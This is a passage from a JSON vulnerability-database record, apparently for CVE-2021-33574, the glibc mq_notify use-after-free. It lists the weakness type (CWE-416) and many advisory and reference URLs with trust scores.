"trust": 0.1,
"url": "https://github.com/Live-Hack-CVE/CVE-2021-33574 "
},
{
"title": "CVE-2021-33574",
"trust": 0.1,
"url": "https://github.com/JamesGeee/CVE-2021-33574 "
},
{
"title": "cks-notes",
"trust": 0.1,
"url": "https://github.com/ruzickap/cks-notes "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/Live-Hack-CVE/CVE-2021-38604 "
},
{
"title": "ochacafe-s5-3",
"trust": 0.1,
"url": "https://github.com/oracle-japan/ochacafe-s5-3 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-33574"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-416",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-393646"
},
{
"db": "NVD",
"id": "CVE-2021-33574"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20210629-0005/"
},
{
"trust": 1.7,
"url": "https://security.gentoo.org/glsa/202107-07"
},
{
"trust": 1.7,
"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896"
},
{
"trust": 1.7,
"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/kjyyimddyohtp2porlabtohyqyyrezdd/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/rbuuwugxvilqxvweou7n42ichpjnaeup/"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/cve/cve-2021-27645"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/cve/cve-2021-33574"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/cve/cve-2021-35942"
},
{
"trust": 0.9,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.9,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-3200"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-13435"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2019-5827"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-24370"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2019-13751"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2019-19603"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2019-17594"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-12762"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-36086"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-22898"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-16135"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-36084"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-3800"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-36087"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-3445"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-22925"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-20232"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2019-20838"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-22876"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-20231"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-14155"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-36085"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-33560"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2019-17595"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-28153"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2019-13750"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2019-18218"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-3580"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/rbuuwugxvilqxvweou7n42ichpjnaeup/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/kjyyimddyohtp2porlabtohyqyyrezdd/"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2021-3572"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2021-20266"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2021-3426"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-3778"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-42574"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-3796"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27645"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0245"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3905"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6526524"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1071"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4019"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3398"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165862/red-hat-security-advisory-2022-0434-05.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5140"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/glibc-use-after-free-via-mq-notify-35692"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3336"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3214"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0716"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021092807"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0394"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0493"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3935"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164863/red-hat-security-advisory-2021-4358-03.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4229"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4059"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166051/red-hat-security-advisory-2022-0580-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021070604"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021100416"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4254"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3785"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165758/red-hat-security-advisory-2022-0318-06.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4095"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4172"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163406/gentoo-linux-security-advisory-202107-07.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166308/red-hat-security-advisory-2022-0842-01.html"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-23841"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-23840"
},
{
"trust": 0.5,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22876"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20231"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22898"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20232"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-14145"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3712"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2018-20673"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-28153"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20266"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-25013"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-35522"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-35524"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-43527"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-25014"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-25012"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-35521"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-17541"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-36331"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-31535"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-36330"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-36332"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3481"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-25009"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-25010"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-35523"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33574"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23841"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23840"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-17541"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-37750"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10001"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2016-4658"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-4658"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-10001"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20271"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33560"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3200"
},
{
"trust": 0.2,
"url": "https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-29923"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-009"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35524"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-37136"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44228"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35523"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:5128"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-37137"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21409"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36330"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4358"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-35942"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.5_release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27823"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3733"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1870"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3575"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30758"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15389"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33938"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-5727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33929"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5785"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-41617"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30665"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12973"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30689"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30682"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33928"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22946"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-18032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1801"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33930"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1765"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26927"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27918"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30749"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30795"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-5785"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1788"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30744"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21775"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27814"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36241"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30797"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20321"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27842"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1799"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21779"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29623"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3948"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22947"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27828"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12973"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1844"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1871"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29338"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30734"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26926"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28650"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24870"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1789"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30663"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30799"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3272"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0202"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15389"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27824"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0580"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-40346"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-39241"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24348"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20271"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44790"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23133"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3573"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26141"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27777"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26147"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14615"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36386"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29650"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24587"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26144"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29155"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33033"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20197"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3487"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-0427"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36312"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-31829"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-31440"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26145"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3564"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35448"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3489"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24503"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28971"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26146"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26139"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3679"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24588"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36158"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24504"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33194"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3348"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24503"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20284"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29646"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0427"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14615"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24502"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-0129"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3635"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26143"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29368"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20194"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3659"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33200"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29660"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26140"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3600"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24586"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20239"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24502"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3732"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28950"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4627"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-31916"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20095"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28493"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-42771"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26301"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26301"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28957"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8037"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8037"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20095"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28493"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23343"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-32690"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-39293"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3749"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4902"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23343"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3801"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23369"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23383"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23369"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23383"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4032"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3445"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/latest/distr_tracing/distr_tracing_install/distr-tracing-updating.html"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/latest/distr_tracing/distributed-tracing-release-notes.html"
},
{
"trust": 0.1,
